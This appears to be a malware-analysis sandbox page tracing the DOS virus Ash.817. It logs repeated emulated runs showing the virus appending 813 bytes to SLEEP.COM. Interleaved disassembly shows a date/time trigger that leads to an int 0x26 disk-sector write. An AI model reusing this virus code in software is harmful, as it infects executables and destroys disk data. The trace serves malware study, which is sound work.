Sample viewer

vx.netlux.org/Virus.DOS.Ash.817


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:23:13.790666094Z 26 PC: 1416d | Set disk transfer address
2018-12-17T22:23:13.799979377Z 78 PC: 141c6 | Find first file
2018-12-17T22:23:13.806001611Z 61 PC: 141d2 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:23:13.812362887Z 63 PC: 141e1 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:23:13.818011743Z 66 PC: 141fa | Move file pointer
2018-12-17T22:23:13.819365302Z 64 PC: 1420f | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:23:13.822232379Z 64 PC: 14111 | Write file or device (Write 813 bytes on handle 5)
2018-12-17T22:23:13.837654187Z 66 PC: 14233 | Move file pointer
2018-12-17T22:23:13.838993727Z 64 PC: 14255 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:23:13.845287066Z 62 PC: 141ba | Close file
2018-12-17T22:23:13.853974621Z 79 PC: 141c6 | Find next file
2018-12-17T22:23:13.856650212Z 61 PC: 141d2 | Open file (Filename = '')
2018-12-17T22:23:13.858996357Z 79 PC: 141c6 | Find next file
2018-12-17T22:23:13.862228655Z 61 PC: 141d2 | Open file (Filename = '')
2018-12-17T22:23:13.864318154Z 79 PC: 141c6 | Find next file
2018-12-17T22:23:13.866678707Z 61 PC: 141d2 | Open file (Filename = '')
2018-12-17T22:23:13.869907973Z 79 PC: 141c6 | Find next file
2018-12-17T22:23:13.872530716Z 61 PC: 141d2 | Open file (Filename = '')
2018-12-17T22:23:13.87458083Z 79 PC: 141c6 | Find next file
2018-12-17T22:23:13.881283581Z 61 PC: 141d2 | Open file (Filename = '')
2018-12-17T22:23:13.883277525Z 79 PC: 141c6 | Find next file
2018-12-17T22:23:13.885650497Z 61 PC: 141d2 | Open file (Filename = '')
2018-12-17T22:23:13.88798241Z 79 PC: 141c6 | Find next file
2018-12-17T22:23:13.890273272Z 61 PC: 141d2 | Open file (Filename = '')
2018-12-17T22:23:13.891740732Z 79 PC: 141c6 | Find next file
2018-12-17T22:23:13.893686915Z 59 PC: 14288 | Change current directory
2018-12-17T22:23:13.896617372Z 42 PC: 14297 | Get date
0x14297: cmp dl, 6
0x1429a: jne 0x142a1
0x1429c: xor ax, ax
0x1429e: jmp 0x142bf
0x142a0: nop
0x142a1: mov ah, 0x2c
0x142a3: int 0x21
0x142a5: or cl, cl
0x142a7: jne 0x142cc
0x142a9: cmp ch, 8
0x142ac: jge 0x142cc
0x142ae: add cl, ch
0x142b0: mov ax, cx
0x142b2: cwde
0x142b3: add al, dh
0x142b5: adc al, dl
0x142b7: adc ah, 0
0x142ba: or ax, ax
0x142bc: jne 0x142bf
0x142be: inc ax
2018-12-17T22:23:13.898162929Z 44 PC: 142a5 | Get time
0x142a5: or cl, cl
0x142a7: jne 0x142cc
0x142a9: cmp ch, 8
0x142ac: jge 0x142cc
0x142ae: add cl, ch
0x142b0: mov ax, cx
0x142b2: cwde
0x142b3: add al, dh
0x142b5: adc al, dl
0x142b7: adc ah, 0
0x142ba: or ax, ax
0x142bc: jne 0x142bf
0x142be: inc ax
0x142bf: mov dx, ax
0x142c1: mov cx, 1
0x142c4: xor bx, bx
0x142c6: mov ah, 0x19
0x142c8: int 0x21
0x142ca: int 0x26
0x142cc: mov bx, 0x3d2
2018-12-17T22:23:13.900166579Z 44 PC: 142d3 | Get time
0x142d3: inc dh
0x142d5: cmp dh, byte ptr [0x3d6]
0x142d9: jl 0x142e1
0x142db: sub dh, byte ptr [0x3d6]
0x142df: jmp 0x142d5
0x142e1: mov al, dh
0x142e3: mov cl, al
0x142e5: cwde
0x142e6: shl ax, 1
0x142e8: add bx, ax
0x142ea: mov si, word ptr [bx]
0x142ec: mov ch, byte ptr [si - 1]
0x142ef: mov dx, si
0x142f1: mov ah, 9
0x142f3: int 0x21
0x142f5: cmp ch, 0
0x142f8: je 0x14323
0x142fa: cmp ch, 1
0x142fd: je 0x142fd
0x142ff: cmp ch, 2

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4067,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:50:56.560659942Z 26 PC: 1416d | Set disk transfer address
2018-12-25T11:50:56.562660755Z 78 PC: 141c6 | Find first file
2018-12-25T11:50:56.56847881Z 61 PC: 141d2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:56.575119531Z 63 PC: 141e1 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:50:56.582083709Z 66 PC: 141fa | Move file pointer
2018-12-25T11:50:56.583556282Z 64 PC: 1420f | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:50:56.586463486Z 64 PC: 14111 | Write file or device (Write 813 bytes on handle 5)
2018-12-25T11:50:56.601963448Z 66 PC: 14233 | Move file pointer
2018-12-25T11:50:56.60370947Z 64 PC: 14255 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:50:56.611114039Z 62 PC: 141ba | Close file
2018-12-25T11:50:56.61968265Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.622438173Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.624537699Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.628182664Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.63096263Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.633482193Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.635679493Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.639296198Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.641526055Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.644391415Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.647623974Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.650167259Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.652443243Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.655900057Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.658285782Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.661252717Z 59 PC: 14288 | Change current directory
2018-12-25T11:50:56.666363528Z 42 PC: 14297 | Get date
0x14297: cmp dl, 6
0x1429a: jne 0x142a1
0x1429c: xor ax, ax
0x1429e: jmp 0x142bf
0x142a0: nop
0x142a1: mov ah, 0x2c
0x142a3: int 0x21
0x142a5: or cl, cl
0x142a7: jne 0x142cc
0x142a9: cmp ch, 8
0x142ac: jge 0x142cc
0x142ae: add cl, ch
0x142b0: mov ax, cx
0x142b2: cwde
0x142b3: add al, dh
0x142b5: adc al, dl
0x142b7: adc ah, 0
0x142ba: or ax, ax
0x142bc: jne 0x142bf
0x142be: inc ax
2018-12-25T11:50:56.668837235Z 44 PC: 142a5 | Get time
0x142a5: or cl, cl
0x142a7: jne 0x142cc
0x142a9: cmp ch, 8
0x142ac: jge 0x142cc
0x142ae: add cl, ch
0x142b0: mov ax, cx
0x142b2: cwde
0x142b3: add al, dh
0x142b5: adc al, dl
0x142b7: adc ah, 0
0x142ba: or ax, ax
0x142bc: jne 0x142bf
0x142be: inc ax
0x142bf: mov dx, ax
0x142c1: mov cx, 1
0x142c4: xor bx, bx
0x142c6: mov ah, 0x19
0x142c8: int 0x21
0x142ca: int 0x26
0x142cc: mov bx, 0x3d2
2018-12-25T11:50:56.671324143Z 25 PC: 142ca | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4067,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:50:56.69872525Z 26 PC: 1416d | Set disk transfer address
2018-12-25T11:50:56.700375781Z 78 PC: 141c6 | Find first file
2018-12-25T11:50:56.706183351Z 61 PC: 141d2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:56.726683074Z 63 PC: 141e1 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:50:56.733849367Z 66 PC: 141fa | Move file pointer
2018-12-25T11:50:56.735280283Z 64 PC: 1420f | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:50:56.738462163Z 64 PC: 14111 | Write file or device (Write 813 bytes on handle 5)
2018-12-25T11:50:56.755142962Z 66 PC: 14233 | Move file pointer
2018-12-25T11:50:56.758534035Z 64 PC: 14255 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:50:56.765352618Z 62 PC: 141ba | Close file
2018-12-25T11:50:56.775259991Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.778260755Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.780715085Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.783842806Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.78692513Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.789714183Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.798392076Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.801831196Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.804918814Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.807608843Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.810565093Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.813125708Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.815251475Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.818444859Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.820621506Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.822887816Z 59 PC: 14288 | Change current directory
2018-12-25T11:50:56.827740126Z 42 PC: 14297 | Get date
0x14297: cmp dl, 6
0x1429a: jne 0x142a1
0x1429c: xor ax, ax
0x1429e: jmp 0x142bf
0x142a0: nop
0x142a1: mov ah, 0x2c
0x142a3: int 0x21
0x142a5: or cl, cl
0x142a7: jne 0x142cc
0x142a9: cmp ch, 8
0x142ac: jge 0x142cc
0x142ae: add cl, ch
0x142b0: mov ax, cx
0x142b2: cwde
0x142b3: add al, dh
0x142b5: adc al, dl
0x142b7: adc ah, 0
0x142ba: or ax, ax
0x142bc: jne 0x142bf
0x142be: inc ax
2018-12-25T11:50:56.830338064Z 44 PC: 142a5 | Get time
0x142a5: or cl, cl
0x142a7: jne 0x142cc
0x142a9: cmp ch, 8
0x142ac: jge 0x142cc
0x142ae: add cl, ch
0x142b0: mov ax, cx
0x142b2: cwde
0x142b3: add al, dh
0x142b5: adc al, dl
0x142b7: adc ah, 0
0x142ba: or ax, ax
0x142bc: jne 0x142bf
0x142be: inc ax
0x142bf: mov dx, ax
0x142c1: mov cx, 1
0x142c4: xor bx, bx
0x142c6: mov ah, 0x19
0x142c8: int 0x21
0x142ca: int 0x26
0x142cc: mov bx, 0x3d2
2018-12-25T11:50:56.832539782Z 25 PC: 142ca | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":8,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4067,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:50:57.006771194Z 26 PC: 1416d | Set disk transfer address
2018-12-25T11:50:57.009793866Z 78 PC: 141c6 | Find first file
2018-12-25T11:50:57.015523752Z 61 PC: 141d2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:57.021756748Z 63 PC: 141e1 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:50:57.028727397Z 66 PC: 141fa | Move file pointer
2018-12-25T11:50:57.030735212Z 64 PC: 1420f | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:50:57.034528473Z 64 PC: 14111 | Write file or device (Write 813 bytes on handle 5)
2018-12-25T11:50:57.054767633Z 66 PC: 14233 | Move file pointer
2018-12-25T11:50:57.057230811Z 64 PC: 14255 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:50:57.066863113Z 62 PC: 141ba | Close file
2018-12-25T11:50:57.076813316Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.078683232Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.080200756Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.082084475Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.083956981Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.085687992Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.087182654Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.089421135Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.090939353Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.092629516Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.094649545Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.09631972Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.097766475Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.100118505Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.101708834Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.103570484Z 59 PC: 14288 | Change current directory
2018-12-25T11:50:57.106989486Z 42 PC: 14297 | Get date
0x14297: cmp dl, 6
0x1429a: jne 0x142a1
0x1429c: xor ax, ax
0x1429e: jmp 0x142bf
0x142a0: nop
0x142a1: mov ah, 0x2c
0x142a3: int 0x21
0x142a5: or cl, cl
0x142a7: jne 0x142cc
0x142a9: cmp ch, 8
0x142ac: jge 0x142cc
0x142ae: add cl, ch
0x142b0: mov ax, cx
0x142b2: cwde
0x142b3: add al, dh
0x142b5: adc al, dl
0x142b7: adc ah, 0
0x142ba: or ax, ax
0x142bc: jne 0x142bf
0x142be: inc ax
2018-12-25T11:50:57.109569304Z 44 PC: 142a5 | Get time
0x142a5: or cl, cl
0x142a7: jne 0x142cc
0x142a9: cmp ch, 8
0x142ac: jge 0x142cc
0x142ae: add cl, ch
0x142b0: mov ax, cx
0x142b2: cwde
0x142b3: add al, dh
0x142b5: adc al, dl
0x142b7: adc ah, 0
0x142ba: or ax, ax
0x142bc: jne 0x142bf
0x142be: inc ax
0x142bf: mov dx, ax
0x142c1: mov cx, 1
0x142c4: xor bx, bx
0x142c6: mov ah, 0x19
0x142c8: int 0x21
0x142ca: int 0x26
0x142cc: mov bx, 0x3d2
2018-12-25T11:50:57.112323449Z 44 PC: 142d3 | Get time
0x142d3: inc dh
0x142d5: cmp dh, byte ptr [0x3d6]
0x142d9: jl 0x142e1
0x142db: sub dh, byte ptr [0x3d6]
0x142df: jmp 0x142d5
0x142e1: mov al, dh
0x142e3: mov cl, al
0x142e5: cwde
0x142e6: shl ax, 1
0x142e8: add bx, ax
0x142ea: mov si, word ptr [bx]
0x142ec: mov ch, byte ptr [si - 1]
0x142ef: mov dx, si
0x142f1: mov ah, 9
0x142f3: int 0x21
0x142f5: cmp ch, 0
0x142f8: je 0x14323
0x142fa: cmp ch, 1
0x142fd: je 0x142fd
0x142ff: cmp ch, 2

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":8,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4067,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:50:57.350004144Z 26 PC: 1416d | Set disk transfer address
2018-12-25T11:50:57.352320308Z 78 PC: 141c6 | Find first file
2018-12-25T11:50:57.357649534Z 61 PC: 141d2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:57.363863663Z 63 PC: 141e1 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:50:57.37084602Z 66 PC: 141fa | Move file pointer
2018-12-25T11:50:57.372373193Z 64 PC: 1420f | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:50:57.375378194Z 64 PC: 14111 | Write file or device (Write 813 bytes on handle 5)
2018-12-25T11:50:57.389746681Z 66 PC: 14233 | Move file pointer
2018-12-25T11:50:57.400527223Z 64 PC: 14255 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:50:57.407360342Z 62 PC: 141ba | Close file
2018-12-25T11:50:57.416442403Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.419899561Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.422430758Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.425281548Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.42885755Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.43171051Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.434210534Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.439189987Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.441643477Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.444463509Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.447914989Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.450835139Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.453418939Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.457402797Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.459926398Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.462918805Z 59 PC: 14288 | Change current directory
2018-12-25T11:50:57.467369651Z 42 PC: 14297 | Get date
0x14297: cmp dl, 6
0x1429a: jne 0x142a1
0x1429c: xor ax, ax
0x1429e: jmp 0x142bf
0x142a0: nop
0x142a1: mov ah, 0x2c
0x142a3: int 0x21
0x142a5: or cl, cl
0x142a7: jne 0x142cc
0x142a9: cmp ch, 8
0x142ac: jge 0x142cc
0x142ae: add cl, ch
0x142b0: mov ax, cx
0x142b2: cwde
0x142b3: add al, dh
0x142b5: adc al, dl
0x142b7: adc ah, 0
0x142ba: or ax, ax
0x142bc: jne 0x142bf
0x142be: inc ax
2018-12-25T11:50:57.469430371Z 44 PC: 142a5 | Get time
0x142a5: or cl, cl
0x142a7: jne 0x142cc
0x142a9: cmp ch, 8
0x142ac: jge 0x142cc
0x142ae: add cl, ch
0x142b0: mov ax, cx
0x142b2: cwde
0x142b3: add al, dh
0x142b5: adc al, dl
0x142b7: adc ah, 0
0x142ba: or ax, ax
0x142bc: jne 0x142bf
0x142be: inc ax
0x142bf: mov dx, ax
0x142c1: mov cx, 1
0x142c4: xor bx, bx
0x142c6: mov ah, 0x19
0x142c8: int 0x21
0x142ca: int 0x26
0x142cc: mov bx, 0x3d2
2018-12-25T11:50:57.471624385Z 44 PC: 142d3 | Get time
0x142d3: inc dh
0x142d5: cmp dh, byte ptr [0x3d6]
0x142d9: jl 0x142e1
0x142db: sub dh, byte ptr [0x3d6]
0x142df: jmp 0x142d5
0x142e1: mov al, dh
0x142e3: mov cl, al
0x142e5: cwde
0x142e6: shl ax, 1
0x142e8: add bx, ax
0x142ea: mov si, word ptr [bx]
0x142ec: mov ch, byte ptr [si - 1]
0x142ef: mov dx, si
0x142f1: mov ah, 9
0x142f3: int 0x21
0x142f5: cmp ch, 0
0x142f8: je 0x14323
0x142fa: cmp ch, 1
0x142fd: je 0x142fd
0x142ff: cmp ch, 2